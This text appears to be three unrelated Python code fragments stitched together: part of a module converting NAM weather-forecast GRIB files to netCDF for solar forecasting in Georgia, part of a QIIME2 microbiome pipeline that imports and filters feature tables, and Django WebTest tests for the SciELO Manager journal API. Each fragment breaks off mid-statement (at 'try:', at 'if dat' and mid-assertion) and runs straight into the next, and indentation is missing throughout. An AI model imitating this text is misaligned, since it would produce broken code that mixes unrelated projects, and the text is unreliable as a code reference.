ds = ds.drop(unwanted)
ds = ds.rename(features)
# Subset the geographic region to a square area centered around Macon, GA.
ds = ds.isel(y=slice(63, 223, None), x=slice(355, 515, None))
# Free memory from unused features and areas.
ds = ds.copy(deep=True)
# Compute the coordinates for x and y
x, y = proj_coords(ds.lat.data, ds.lon.data)
x, y = x[0,:], y[:,0]
ds = ds.assign_coords(x=x, y=y)
# Add a z dimension to variables that don't have one.
for v in ds.data_vars:
if ds[v].dims == ('y', 'x'):
layer = ds[v].name.split('_')[1]
ds[v] = ds[v].expand_dims(f'z_{layer}')
# Create reftime and forecast dimensions.
# Both are stored as integers with appropriate units.
# The reftime dimension is hours since the Unix epoch (1970-01-01 00:00).
# The forecast dimension is hours since the reftime.
reftime = apollo.Timestamp(reftime).floor('6h')
epoch = apollo.Timestamp('1970-01-01 00:00')
delta_seconds = int((reftime - epoch).total_seconds())
delta_hours = delta_seconds // 60 // 60
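# For example (illustrative arithmetic only): a reftime of 2018-01-01 00:00 UTC
# lies 17532 days after the epoch, so delta_hours == 17532 * 24 == 420768.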
ds = ds.assign_coords(
reftime=delta_hours,
forecast=forecast,
)
for v in ds.data_vars:
ds[v] = ds[v].expand_dims(('reftime', 'forecast'))
# Fix the z_SPDY coordinate.
# The layer is defined in term of bounds above and below.
# The dataset expresses this as three coordinates: the index, lower bound, and upper bound.
# We kept the index and now replace the values to be the upper bound, in Pascals
ds['z_SPDY'] = ds['z_SPDY'].assign_attrs(
comment='The values give the upper bound of the layer, the lower bound is 3000 Pa less',
)
ds['z_SPDY'].data = np.array([3000, 6000, 9000, 12000, 15000, 18000])
# Set metadata according to CF conventions
# http://cfconventions.org/Data/cf-conventions/cf-conventions-1.7/cf-conventions.html
metadata = {
# Data Variables
# TODO: The wind directions may be backwards, should be confirmed with NCEP.
'DLWRF_SFC': {'standard_name':'downwelling_longwave_flux', 'units':'W/m^2'},
'DSWRF_SFC': {'standard_name':'downwelling_shortwave_flux', 'units':'W/m^2'},
'HGT_0DEG': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_CBL': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_ISBL': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_LLTW': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_TOA': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_SFC': {'standard_name':'geopotential_height', 'units':'gpm'},
'PRES_MWSL': {'standard_name':'air_pressure', 'units':'Pa'},
'PRES_SFC': {'standard_name':'air_pressure', 'units':'Pa'},
'PRES_TRO': {'standard_name':'air_pressure', 'units':'Pa'},
'PWAT_EATM': {'standard_name':'atmosphere_water_vapor_content', 'units':'kg/m^2'},
'REFC_EATM': {'standard_name':'equivalent_reflectivity_factor', 'units':'dBZ'},
'REFD_HTGL': {'standard_name':'equivalent_reflectivity_factor', 'units':'dBZ'},
'REFD_HYBL': {'standard_name':'equivalent_reflectivity_factor', 'units':'dBZ'},
'RH_0DEG': {'standard_name':'relative_humidity', 'units':'%'},
'RH_ISBL': {'standard_name':'relative_humidity', 'units':'%'},
'RH_SIGY': {'standard_name':'relative_humidity', 'units':'%'},
'RH_SPDY': {'standard_name':'relative_humidity', 'units':'%'},
'LHTFL_SFC': {'standard_name':'upward_latent_heat_flux', 'units':'W/m2'},
'SHTFL_SFC': {'standard_name':'upward_sensible_heat_flux', 'units':'W/m2'},
'TCC_EATM': {'standard_name':'cloud_area_fraction', 'units':'%'},
'TKE_ISBL': {'standard_name':'atmosphere_kinetic_energy_content', 'units':'J/kg'},
'TMP_HTGL': {'standard_name':'air_temperature', 'units':'K'},
'TMP_ISBL': {'standard_name':'air_temperature', 'units':'K'},
'TMP_SFC': {'standard_name':'air_temperature', 'units':'K'},
'TMP_SPDY': {'standard_name':'air_temperature', 'units':'K'},
'TMP_TRO': {'standard_name':'air_temperature', 'units':'K'},
'UGRD_HTGL': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_ISBL': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_MWSL': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_TOA': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_SPDY': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_TRO': {'standard_name':'eastward_wind', 'units':'m/s'},
'VGRD_HTGL': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_ISBL': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_MWSL': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_TOA': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_SPDY': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_TRO': {'standard_name':'northward_wind', 'units':'m/s'},
'VIS_SFC': {'standard_name':'visibility', 'units':'m'},
'VVEL_ISBL': {'standard_name':'vertical_air_velocity_expressed_as_tendency_of_pressure',
'units':'Pa/s'},
# Coordinates
# I couldn't find standard names for all of the layers...
# I'm not sure if both forecast and reftime should be marked as axis T...
'x': {'axis':'X', 'standard_name':'projection_x_coordinate', 'units':'m'},
'y': {'axis':'Y', 'standard_name':'projection_y_coordinate', 'units':'m'},
'z_CBL': {'axis':'Z', 'standard_name':'cloud_base'},
'z_HYBL': {'axis':'Z', 'standard_name':'atmosphere_hybrid_sigma_pressure_coordinate'},
'z_TOA': {'axis':'Z', 'standard_name':'toa'},
'z_SFC': {'axis':'Z', 'standard_name':'surface'},
'z_SIGY': {'axis':'Z', 'standard_name':'atmosphere_sigma_coordinate'},
'z_TRO': {'axis':'Z', 'standard_name':'tropopause'},
'z_SPDY': {'axis':'Z', 'long_name':'specified pressure difference', 'units':'Pa'},
'z_HTGL1': {'axis':'Z', 'long_name':'fixed_height_above_ground', 'units':'m'},
'z_HTGL2': {'axis':'Z', 'long_name':'fixed_height_above_ground', 'units':'m'},
'z_HTGL3': {'axis':'Z', 'long_name':'fixed_height_above_ground', 'units':'m'},
'z_ISBL': {'axis':'Z', 'long_name':'isobaric_level', 'units':'Pa'},
'z_0DEG': {'axis':'Z', 'long_name':'0_degree_C_isotherm'},
'z_EATM': {'axis':'Z', 'long_name':'entire_atmosphere'},
'z_LLTW': {'axis':'Z', 'long_name':'lowest_level_of_the_wet_bulb_zero'},
'z_MWSL': {'axis':'Z', 'long_name':'max_wind_surface_layer'},
'forecast': {'axis':'T', 'standard_name':'forecast_period', 'units':'hours'},
'reftime': {'axis':'T', 'standard_name':'forecast_reference_time', 'units':'hours since 1970-01-01T00:00'},
'lat': {'standard_name':'latitude', 'units':'degree_north'},
'lon': {'standard_name':'longitude', 'units':'degree_east'},
}
for v in metadata:
ds[v] = ds[v].assign_attrs(metadata[v])
now = apollo.Timestamp('now')
ds.attrs['title'] = 'NAM-UGA, a subset of NAM-NMM for solar forecasting research in Georgia'
ds.attrs['history'] = f'{now.isoformat()} Initial conversion from GRIB files released by NCEP\n'
ds = xr.decode_cf(ds)
return ds
def _open_dataset(paths):
'''Open one or more netCDF files as a single dataset.
This is a wrapper around :func:`xarray.open_mfdataset` providing defaults
relevant to Apollo's filesystem layout.
Arguments:
paths (str or pathlib.Path or list):
One or more paths to the datasets.
Returns:
xarray.Dataset:
The combined dataset.
'''
if isinstance(paths, (str, Path)):
paths = [paths]
# Xarray and libnetcdf sometimes send trash to stdout or stderr.
# We completely silence both streams temporarily.
with builtins.open('/dev/null', 'w') as dev_null:
with contextlib.redirect_stdout(dev_null):
with contextlib.redirect_stderr(dev_null):
return xr.open_mfdataset(paths, combine='by_coords')
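# Usage sketch (assumes `nc_path` from this module maps a reftime to a cached
# netCDF file, as used in `download` below; the reftimes shown are arbitrary):
#
#     ds = _open_dataset([nc_path('2019-06-01 00:00'), nc_path('2019-06-01 06:00')])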
def download(reftime='now', save_nc=True, keep_gribs=False, force=False, **kwargs):
'''Download a forecast.
The download is skipped for GRIB files in the cache.
Arguments:
reftime (timestamp):
The reference time to open.
save_nc (bool or None):
Whether to save the processed forecast in the cache as a netCDF.
keep_gribs (bool or None):
Whether to save the raw forecast in the cache as a set of GRIBs.
force (bool):
If true, download even if the dataset already exists locally.
max_tries (int):
The maximum number of failed downloads for a single file
before raising an `IOError`. Exponential backoff is applied
between attempts, starting at 1 second.
timeout (int):
The network timeout in seconds. The government servers are often
slow to respond.
fail_fast (bool):
If true, the download errors are treated as fatal.
This overrides the `max_tries` argument.
Returns:
xarray.Dataset:
A dataset for the forecast at this reftime.
'''
# No need to download if we already have the dataset.
if not force and nc_path(reftime).exists():
logger.info(f'skipping download, file exists: {nc_path(reftime)}')
return open(reftime, on_miss='raise')
# We save each GRIB as a netCDF in a temp directory, then reopen all
# as a single dataset, which we finally persist in the datastore.
# It is important to persist the intermediate datasets for performance
# and memory usage.
with TemporaryDirectory() as tmpdir:
tmpdir = Path(tmpdir)
paths = []
for forecast in FORECAST_PERIOD:
path = tmpdir / f'{forecast}.nc'
ds = _download_grib(reftime, forecast)
ds = _process_grib(ds, reftime, forecast)
ds.to_netcdf(path)
paths.append(path)
ds = _open_dataset(paths)
if save_nc:
path = nc_path(reftime)
logger.info(f'writing {path}')
ds.to_netcdf(path)
ds = _open_dataset([path])
if not keep_gribs:
for forecast in FORECAST_PERIOD:
path = grib_path(reftime, forecast)
logger.info(f'deleting {path}')
path.unlink()
return ds
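# Usage sketch (the reftime below is an arbitrary example; per the docstring,
# any value accepted by apollo.Timestamp should work):
#
#     ds = download('2019-06-01 06:00')               # fetch, convert, and cache as netCDF
#     ds = download(save_nc=True, keep_gribs=False)   # most recent forecast, discard raw GRIBs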
def open(reftimes='now', on_miss='raise', **kwargs):
'''Open a forecast for one or more reference times.
Arguments:
reftimes (timestamp or sequence):
The reference time(s) to open. The default is to load the most
recent forecast.
on_miss ('raise' or 'download' or 'skip'):
Determines the behavior on a cache miss:
- ``'raise'``: Raise a :class:`CacheMiss` exception.
- ``'download'``: Attempt to download the missing forecast.
- ``'skip'``: Skip missing forecasts. This mode will raise a
:class:`CacheMiss` exception only if the resulting dataset
would be empty.
**kwargs:
Additional keyword arguments are forwarded to :func:`download`.
Returns:
xarray.Dataset:
A single dataset containing all forecasts at the given reference
times.
'''
if on_miss not in ('raise', 'download', 'skip'):
raise ValueError(f"Unknown cache miss strategy: {repr(on_miss)}")
try:
# ----------------------------------------------------------------------------
# Copyright (c) 2020, <NAME>.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import sys
import yaml
import itertools
import numpy as np
import pandas as pd
from os.path import isfile, splitext
import plotly
import plotly.graph_objs as go
from routine_qiime2_analyses._routine_q2_xpbs import run_xpbs, print_message
from routine_qiime2_analyses._routine_q2_io_utils import (
read_yaml_file, get_job_folder, get_fps, get_raref_tab_meta_pds,
get_raref_table, simple_chunks, get_analysis_folder, filter_mb_table,
filter_non_mb_table)
from routine_qiime2_analyses._routine_q2_cmds import run_import
from routine_qiime2_analyses._routine_q2_mmvec import get_mmvec_dicts
from routine_qiime2_analyses._routine_q2_songbird import get_songbird_dicts
def import_datasets(
i_datasets_folder: str, datasets: dict, datasets_phylo: dict,
force: bool, prjct_nm: str, qiime_env: str, chmod: str,
noloc: bool, run_params: dict, filt_raref: str, jobs: bool,
slurm: bool, chunkit: int) -> None:
"""Initial imports of the .tsv datasets in to Qiime2 Artefacts
Parameters
----------
i_datasets_folder : str
Path to the folder containing the data/metadata subfolders
datasets : dict
Mapping dataset name -> [data file path, metadata file path]
datasets_phylo : dict
Mapping dataset name -> ('tree_to_use', 'corrected_or_not')
force : bool
Force the re-writing of scripts for all commands
prjct_nm : str
Nick name for the project.
qiime_env : str
Name of a qiime2 conda environment where analysis
tools to be run are installed
chmod : str
noloc : bool
run_params : dict
filt_raref : str
jobs : bool
chunkit : int
Returns
-------
"""
job_folder = get_job_folder(i_datasets_folder, 'import_tables')
job_folder2 = get_job_folder(i_datasets_folder, 'import_tables/chunks')
to_chunk = []
main_written = 0
run_pbs = '%s/0_run_import_%s%s.sh' % (job_folder, prjct_nm, filt_raref)
with open(run_pbs, 'w') as o:
for dat, tsv_meta_pds_ in datasets.items():
written = 0
out_sh = '%s/0_run_import_%s_%s%s.sh' % (
job_folder2, prjct_nm, dat, filt_raref)
if slurm:
out_pbs = '%s.slm' % splitext(out_sh)[0]
else:
out_pbs = '%s.pbs' % splitext(out_sh)[0]
with open(out_sh, 'w') as cur_sh:
for tsv_meta_pds in tsv_meta_pds_: # REMOVE IF FIXED NOT KEPT
tsv, meta = tsv_meta_pds
qza = '%s.qza' % splitext(tsv)[0]
if datasets_phylo[dat][1]:
cmd = run_import(tsv, qza, 'FeatureTable[Frequency]')
cur_sh.write('echo "%s"\n' % cmd)
cur_sh.write('%s\n' % cmd)
written += 1
elif force or not isfile(qza):
cmd = run_import(tsv, qza, 'FeatureTable[Frequency]')
cur_sh.write('echo "%s"\n' % cmd)
cur_sh.write('%s\n' % cmd)
written += 1
if written:
main_written += 1
to_chunk.append(out_sh)
if not chunkit:
job_name = '%s.mprt.%s%s' % (prjct_nm, dat, filt_raref)
run_xpbs(
out_sh, out_pbs, job_name, qiime_env,
run_params["time"], run_params["n_nodes"],
run_params["n_procs"], run_params["mem_num"],
run_params["mem_dim"], chmod, written, 'single',
o, noloc, slurm, jobs
)
if to_chunk and chunkit:
simple_chunks(
run_pbs, job_folder2, to_chunk, 'imports', prjct_nm,
run_params["time"], run_params["n_nodes"], run_params["n_procs"],
run_params["mem_num"], run_params["mem_dim"], qiime_env, chmod,
noloc, slurm, jobs, chunkit, None
)
if main_written:
print_message('# Import tables to qiime2', 'sh', run_pbs, jobs)
# def get_threshs(p_filt_threshs):
# if not isfile(p_filt_threshs):
# print('yaml file for filtering thresholds does not exist:\n%s\nExiting...' % p_filt_threshs)
# sys.exit(0)
# with open(p_filt_threshs) as handle:
# try:
# threshs_d = yaml.load(handle, Loader=yaml.FullLoader)
# except AttributeError:
# threshs_d = yaml.load(handle)
# return threshs_d
def deleted_non_filt(datasets: dict, datasets_read: dict, datasets_features: dict,
datasets_phylo: dict, datasets_rarefs: dict, taxonomies: dict,
datasets_filt: dict, datasets_filt_map: dict):
for d in [datasets, datasets_read, datasets_features,
datasets_phylo, datasets_rarefs, taxonomies]:
to_delete = []
for dat in d:
if dat not in datasets_filt_map and dat in datasets_filt:
to_delete.append(dat)
for delete in to_delete:
d.pop(delete)
break
def get_thresholds(threshs_d: dict) -> tuple:
"""
Parameters
----------
threshs_d : dict
Thresholds configs
Returns
-------
names : list
Name for the threshold
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
"""
names = []
if 'names' in threshs_d:
names = threshs_d['names']
thresh_sam = 0
if 'samples' in threshs_d:
thresh_sam = threshs_d['samples']
thresh_feat = 0
if 'features' in threshs_d:
thresh_feat = threshs_d['features']
return names, thresh_sam, thresh_feat
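# Example with a hypothetical thresholds config (as read from the filtering yaml):
#
#     get_thresholds({'names': ['blankA'], 'samples': 500, 'features': 0.0001})
#     # -> (['blankA'], 500, 0.0001)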
def no_filtering(
dat: str,
thresh_sam: int,
thresh_feat: int) -> bool:
"""Checks whether to skip filtering or not.
Parameters
----------
dat : str
Dataset name
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
Returns
-------
skip : bool
Whether to skip filtering or not
"""
skip = False
if not thresh_sam and not thresh_feat:
print('Filtering threshold(s) of 0 do nothing: skipping...')
skip = True
thresh_sam_is_numeric = isinstance(thresh_sam, (float, int))
thresh_feat_is_numeric = isinstance(thresh_feat, (float, int))
if not thresh_sam_is_numeric or not thresh_feat_is_numeric:
print('Filtering threshold for %s not an '
'integer/float: skipping...' % dat)
skip = True
if thresh_sam < 0 or thresh_feat < 0:
print('Filtering threshold must be positive: skipping...')
skip = True
return skip
def get_dat_filt(
dat: str,
names: list,
thresh_sam: int,
thresh_feat: int) -> str:
"""Get a build-up new name for
the filtered version of a dataset.
Parameters
----------
dat : str
Dataset name
names : list
Name for the threshold
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
Returns
-------
dat_filt : str
New dataset name for the filtered version
"""
dat_filt = []
if names:
dat_filt.append('%srm' % len(names))
if thresh_sam:
if thresh_sam > 1:
dat_filt.append('minSam%s' % thresh_sam)
else:
dat_filt.append('minSam%s' % str(thresh_sam).replace('.', ''))
if thresh_feat:
if thresh_feat > 1:
dat_filt.append('minFeat%s' % thresh_feat)
else:
dat_filt.append('minFeat%s' % str(thresh_feat).replace('.', ''))
dat_filt = '%s_%s' % (dat, '-'.join(dat_filt))
return dat_filt
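# Example (hypothetical dataset name and thresholds):
#
#     get_dat_filt('gut', ['featA'], 100, 0.0001)
#     # -> 'gut_1rm-minSam100-minFeat00001'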
def get_applied_thresholds_text(threshs_d: dict) -> tuple:
"""
Parameters
----------
threshs_d : dict
Thresholds configs
Returns
-------
names : list
Name for the threshold
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
"""
names = []
if 'names' in threshs_d:
names = threshs_d['names']
thresh_sam = 0
if 'samples' in threshs_d:
thresh_sam = threshs_d['samples']
thresh_feat = 0
if 'features' in threshs_d:
thresh_feat = threshs_d['features']
return names, thresh_sam, thresh_feat
def filtering_names(
names: list,
tab_filt_pd: pd.DataFrame):
"""
Parameters
----------
names : list
Name for the threshold
tab_filt_pd : pd.DataFrame
Input raw feature table
"""
if names:
names_in = list(set(tab_filt_pd.columns) & set(names))
tab_filt_pd.drop(columns=names_in, inplace=True)
def filtering_samples(
thresh_sam: int,
tab_filt_pd: pd.DataFrame):
"""
Parameters
----------
thresh_sam : int
Samples threshold
tab_filt_pd : pd.DataFrame
Input feature table
"""
if thresh_sam:
samples = tab_filt_pd.columns
if thresh_sam > 1:
to_drop = samples[tab_filt_pd.sum(0) < thresh_sam]
else:
tab_perc_min = tab_filt_pd.sum(0).mean() * thresh_sam
to_drop = samples[tab_filt_pd.sum(0) < tab_perc_min]
if to_drop.size:
tab_filt_pd.drop(columns=to_drop, inplace=True)
def filtering_features(
thresh_feat: int,
tab_filt_pd: pd.DataFrame):
"""
Parameters
----------
thresh_feat : int
Features threshold
tab_filt_pd : pd.DataFrame
Input feature table
"""
if thresh_feat:
if thresh_feat > 1:
tab_filt_rm = tab_filt_pd < thresh_feat
else:
tab_perc = tab_filt_pd / tab_filt_pd.sum(0)
tab_filt_rm = tab_perc < thresh_feat
tab_filt_pd[tab_filt_rm] = 0
def filtering_thresholds(
names: list,
thresh_sam: int,
thresh_feat: int,
tab_pd: pd.DataFrame) -> pd.DataFrame:
"""
Parameters
----------
names : list
Name for the threshold
thresh_sam : int
Samples threshold
thresh_feat : int
Features threshold
tab_pd : pd.DataFrame
Input raw feature table
Returns
-------
tab_filt_pd : pd.DataFrame
Output filtered feature table
"""
tab_filt_pd = tab_pd.copy()
filtering_names(names, tab_filt_pd)
filtering_samples(thresh_sam, tab_filt_pd)
filtering_features(thresh_feat, tab_filt_pd)
tab_filt_pd = tab_filt_pd.loc[tab_filt_pd.sum(1) > 0, :]
tab_filt_pd = tab_filt_pd.loc[:, tab_filt_pd.sum(0) > 0]
return tab_filt_pd
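# A minimal sketch with a made-up counts table (samples as columns, features as rows):
#
#     tab_pd = pd.DataFrame({'s1': [5, 0], 's2': [300, 20]}, index=['f1', 'f2'])
#     filtering_thresholds([], 100, 10, tab_pd)
#     # drops sample 's1' (fewer than 100 reads), zeroes any remaining counts
#     # below 10, then removes empty rows and columns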
def harsh_filtering(
dat_filt: str,
tab_filt_pd: pd.DataFrame) -> bool:
"""
Parameters
----------
dat_filt : str
New dataset name for the filtered version
tab_filt_pd : pd.DataFrame
Filtered feature table
Returns
-------
skip : bool
Whether to skip a too harsh filtering
"""
skip = False
if tab_filt_pd.shape[0] < 10 or tab_filt_pd.shape[1] < 2:
print('Filtering too harsh (no more data for %s): '
'skipping...' % dat_filt)
skip = True
return skip
def filter_rare_samples(
i_datasets_folder: str, datasets: dict, datasets_read: dict,
datasets_features: dict, datasets_rarefs: dict, datasets_filt: dict,
datasets_filt_map: dict, datasets_phylo: dict, prjct_nm: str,
qiime_env: str, p_filt_threshs: str, chmod: str, noloc: bool,
run_params: dict, filt_raref: str, jobs: bool, slurm: bool,
chunkit: int) -> None:
"""
Filter the rare features, keep samples with enough reads/features and import to Qiime2.
:param i_datasets_folder: Path to the folder containing the data/metadata subfolders.
:param datasets: dataset -> [tsv/biom path, meta path]
:param datasets_read: dataset -> [tsv table, meta table]
:param datasets_features: dataset -> list of features names in the dataset tsv / biom file.
:param datasets_phylo: to be updated with ('tree_to_use', 'corrected_or_not') per dataset.
:param prjct_nm: Short nick name for your project.
:param qiime_env: name of your qiime2 conda environment (e.g. qiime2-2019.10).
:param p_filt_threshs: path to the yaml config with the per-dataset filtering thresholds.
:param chmod: whether to change permission of output files (default: 775).
"""
threshs_dats = read_yaml_file(p_filt_threshs)
written = 0
datasets_update = {}
datasets_read_update = {}
datasets_features_update = {}
datasets_phylo_update = {}
job_folder = get_job_folder(i_datasets_folder, 'import_filtered')
out_sh = '%s/1_run_import_filtered_%s%s.sh' % (job_folder, prjct_nm, filt_raref)
if slurm:
out_pbs = '%s.slm' % splitext(out_sh)[0]
else:
out_pbs = '%s.pbs' % splitext(out_sh)[0]
to_chunk = []
with open(out_sh, 'w') as sh:
for dat, tab_meta_pds_ in datasets_read.items():
if dat
<reponame>patymori/scielo-manager
#coding: utf-8
import json
import datetime
from django_webtest import WebTest
from django_factory_boy import auth
from journalmanager.tests import modelfactories
from editorialmanager.tests import modelfactories as editorial_modelfactories
from api.resources_v2 import (
JournalResource,
IssueResource,
)
def _make_auth_environ(username, token):
return {'HTTP_AUTHORIZATION': 'ApiKey {0}:{1}'.format(username, token)}
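# e.g. _make_auth_environ('some_user', 'some_key') returns
#      {'HTTP_AUTHORIZATION': 'ApiKey some_user:some_key'}  (values are placeholders)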
def _makePermission(perm, model, app_label='journalmanager'):
"""
Retrieves a Permission according to the given model and app_label.
"""
from django.contrib.contenttypes import models
from django.contrib.auth import models as auth_models
ct = models.ContentType.objects.get(model=model,
app_label=app_label)
return auth_models.Permission.objects.get(codename=perm, content_type=ct)
def _makeUseLicense():
from journalmanager.models import UseLicense
ul = UseLicense(license_code='TEST')
ul.save()
class JournalRestAPITest(WebTest):
def setUp(self):
self.user = auth.UserF(is_active=True)
self.extra_environ = _make_auth_environ(self.user.username,
self.user.api_key.key)
_makeUseLicense()
def test_journal_index(self):
response = self.app.get('/api/v2/journals/',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_journal_filters(self):
resource_filters = JournalResource().Meta
mandatory_filters = ['is_trashed']
for fltr in mandatory_filters:
self.assertTrue(fltr in resource_filters.filtering)
def test_journal_getone(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('title' in response.content)
def test_post_data_index(self):
response = self.app.post('/api/v2/journals/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data_index(self):
response = self.app.put('/api/v2/journals/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data_index(self):
response = self.app.delete('/api/v2/journals/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_post_data_getone(self):
journal = modelfactories.JournalFactory.create()
response = self.app.post('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data_getone(self):
journal = modelfactories.JournalFactory.create()
response = self.app.put('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data_getone(self):
journal = modelfactories.JournalFactory.create()
response = self.app.delete('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_access_denied_for_unauthorized_users(self):
response = self.app.get('/api/v2/journals/',
status=401)
self.assertEqual(response.status_code, 401)
def test_list_all_journals_by_collection(self):
collection = modelfactories.CollectionFactory()
journal1 = modelfactories.JournalFactory.create()
journal2 = modelfactories.JournalFactory.create()
journal1.join(collection, self.user)
journal2.join(collection, self.user)
response = self.app.get('/api/v2/journals/?collection=%s' % collection.name,
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_api_datamodel(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ)
expected_keys = [
u'editor_address',
u'copyrighter',
u'editor_address_city',
u'editor_address_state',
u'creator',
u'ctrl_vocabulary',
u'national_code',
u'updated',
u'frequency',
u'url_journal',
u'short_title',
u'final_num',
u'logo',
u'publisher_country',
u'publisher_name',
u'eletronic_issn',
u'issues',
u'url_online_submission',
u'init_vol',
u'subject_descriptors',
u'title',
u'pub_status_history',
u'id',
u'final_year',
u'editorial_standard',
u'languages',
u'scielo_issn',
u'collections',
u'index_coverage',
u'secs_code',
u'init_year',
u'sections',
u'is_indexed_aehci',
u'use_license',
u'other_titles',
u'editor_address_country',
u'acronym',
u'publisher_state',
u'is_indexed_scie',
u'sponsors',
u'abstract_keyword_languages',
u'editor_name',
u'other_previous_title',
u'study_areas',
u'medline_code',
u'is_trashed',
u'init_num',
u'publication_city',
u'pub_level',
u'is_indexed_ssci',
u'missions',
u'editor_email',
u'created',
u'medline_title',
u'final_vol',
u'cover',
u'editor_phone2',
u'editor_phone1',
u'print_issn',
u'editor_address_zip',
u'contact',
u'pub_status',
u'pub_status_reason',
u'title_iso',
u'notes',
u'resource_uri',
u'previous_ahead_documents',
u'current_ahead_documents',
u'twitter_user',
u'previous_title',
u'succeeding_title',
u'subject_categories'
]
json_keys = set(response.json.keys())
expected_keys = set(expected_keys)
# looks for unexpected fields
self.assertFalse(json_keys.difference(expected_keys))
# make sure all expected fields are present
for key in expected_keys:
self.assertEqual(True, key in json_keys)
def test_api_collections_data(self):
col1 = modelfactories.CollectionFactory()
col2 = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col1, self.user)
journal.join(col2, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ)
expected_collections = [col1.name, col2.name]
self.assertEqual(response.json['collections'], expected_collections)
def test_filter_by_pubstatus(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
journal.change_status(col, 'current', 'testing', self.user)
journal2 = modelfactories.JournalFactory.create()
journal2.join(col, self.user)
journal2.change_status(col, 'deceased', 'testing', self.user)
response = self.app.get('/api/v2/journals/?pubstatus=current',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 1)
def test_filter_by_pubstatus_many_values(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
journal.change_status(col, 'current', 'testing', self.user)
journal2 = modelfactories.JournalFactory.create()
journal2.join(col, self.user)
journal2.change_status(col, 'deceased', 'testing', self.user)
response = self.app.get('/api/v2/journals/?pubstatus=current&pubstatus=deceased',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 2)
def test_filter_by_pubstatus_many_values_filtering_by_collection(self):
col = modelfactories.CollectionFactory()
col2 = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
journal.change_status(col, 'current', 'testing', self.user)
journal2 = modelfactories.JournalFactory.create()
journal2.join(col2, self.user)
journal2.change_status(col2, 'deceased', 'testing', self.user)
response = self.app.get('/api/v2/journals/?pubstatus=current&pubstatus=deceased&collection=%s' % col.name,
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 1)
def test_filter_print_issn(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create(print_issn='1234-1234')
journal.join(col, self.user)
journal2 = modelfactories.JournalFactory.create(print_issn='4321-4321')
journal2.join(col, self.user)
response = self.app.get('/api/v2/journals/?print_issn=1234-1234',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 1)
self.assertEqual(json.loads(response.content)['objects'][0]['print_issn'], '1234-1234')
def test_filter_eletronic_issn(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create(eletronic_issn='1234-1234')
journal.join(col, self.user)
journal2 = modelfactories.JournalFactory.create(eletronic_issn='4321-4321')
journal2.join(col, self.user)
response = self.app.get('/api/v2/journals/?eletronic_issn=1234-1234',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(json.loads(response.content)['objects']), 1)
self.assertEqual(json.loads(response.content)['objects'][0]['eletronic_issn'], '1234-1234')
def test_succeding_title(self):
col = modelfactories.CollectionFactory()
col.add_user(self.user)
journal1 = modelfactories.JournalFactory.create(title='Previous Title')
journal1.join(col, self.user)
journal2 = modelfactories.JournalFactory.create(title='Succeeding Title', previous_title=journal1)
journal2.join(col, self.user)
response = self.app.get(
'/api/v2/journals/%s/' % journal1.pk,
extra_environ=self.extra_environ).json
self.assertEqual(
response['succeeding_title'],
'/api/v2/journals/%s/' % journal2.pk)
def test_without_succeding_title(self):
col = modelfactories.CollectionFactory()
col.add_user(self.user)
journal1 = modelfactories.JournalFactory.create(title='Previous Title')
journal1.join(col, self.user)
response = self.app.get(
'/api/v2/journals/%s/' % journal1.pk,
extra_environ=self.extra_environ).json
self.assertEqual(
